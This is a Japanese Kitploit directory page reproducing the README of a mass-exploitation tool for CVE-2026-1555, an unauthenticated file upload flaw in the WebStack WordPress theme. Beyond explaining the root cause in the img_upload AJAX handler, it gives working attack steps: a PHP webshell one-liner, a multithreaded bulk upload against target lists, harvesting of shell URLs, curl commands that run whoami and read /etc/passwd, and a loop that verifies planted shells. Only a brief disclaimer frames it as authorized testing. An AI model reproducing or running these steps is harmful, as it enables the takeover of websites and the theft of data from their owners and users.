Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - 未認証の任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-1555
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - 未認証の任意ファイルアップロード

リポジトリを見る
914ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1555

WebStack <= 1.2024 - 認証なし任意ファイルアップロード

👤 作成者: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress 任意ファイルアップロード

img_upload AJAX ハンドラを介した認証なしリモートコード実行

Python CVE CVSS Auth


📌 脆弱性概要

🔬 技術的根本原因

WordPress の admin-ajax.php アクションフック img_upload に登録されている io_img_upload() 関数は、アップロードされたファイルをサーバーに書き込む前に、ファイルタイプや拡張子の検証を一切行いません。このアクションは認証チェックなし(wp_ajax_nopriv_)で登録されているため、認証されていないリモートの攻撃者は PHP ウェブシェルを含む任意のファイルを POST でき、サーバーはそれを公開アクセス可能なパスに保存するため、直接的なリモートコード実行が可能になります。

脆弱なエンドポイント:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ ツール機能

  • 🔁 ワーカー数を設定可能なマルチスレッドスキャン
  • 📋 ターゲットリストファイルによる一括ターゲット対応
  • 📤 JSON レスポンスからのシェル URL 自動抽出
  • 💾 成功したシェル URL を uploaded_paths.txt に保存
  • 🎨 ライブ進捗トラッキング付きのリッチなターミナル UI
  • 🔕 最大限の互換性のため SSL 検証を無効化

📦 必要条件

Python バージョン: 3.8+

依存関係をインストール:

root@kitploit:~
pip install requests rich urllib3

🚀 使用方法

1. ターゲットリストを準備する

list.txt(または任意の名前)というファイルを作成し、1 行に 1 ターゲットを記述します:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

http:// または https:// が付いていないターゲットには、自動的に http:// がプレフィックスとして付加されます。

2. ペイロードを準備する

ウェブシェルをスクリプトと同じディレクトリに配置します。例:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. ツールを実行する

root@kitploit:~
python CVE-2026-1555.py

以下の入力を求められます:

プロンプト

📤 出力とシェル抽出

ライブ出力

アップロードが成功するたびに以下が表示されます:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

保存された結果

成功したすべてのシェル URL が以下に追記されます:

root@kitploit:~
uploaded_paths.txt

シェルへのアクセス

アップロード成功後、ブラウザまたは curl でシェルに直接アクセスできます:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

正確なアップロードパスはサーバーの JSON レスポンス(data.src)から抽出され、自動的に表示されます。

シェルの一括検証

出力ファイルからアップロード済みの全シェルをすばやく検証します:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 サマリー出力

各実行の終了時にサマリーが表示されます:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ ファイル構成

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ 免責事項

このツールは、正規の許可を得たペネトレーションテスト、セキュリティ研究、教育目的のみに提供されています。

作者である Nxploited は、このツールを使用して行われた不正使用、損害、または違法行為について一切の責任を負いません。このツールを使用することで、すべてのターゲットシステムをテストする明示的な書面による許可を得ていることを確認したことになります。

所有していない、またはテストする明示的な許可を得ていないシステムに対する不正使用は違法であり、該当するサイバー犯罪法に基づき刑事訴追される可能性があります。

責任を持って使用してください。あなた自身の行動に対して単独で責任を負います。


👤 作者: Nxploited 📣 チャンネル: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

ツールをダウンロード
項目詳細
CVE IDCVE-2026-1555
影響を受けるコンポーネントWebStack Theme for WordPress
影響を受けるバージョン1.2024 までの全バージョン
脆弱性の種類任意ファイルアップロード → リモートコード実行
認証要件❌ 不要(認証なし)
CVSS スコア9.8 CRITICAL
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
説明
デフォルト
Targets fileターゲットリストへのパスlist.txt
Threads同時実行ワーカー数6
Local file to uploadペイロードのファイル名(スクリプトディレクトリ内)shell.php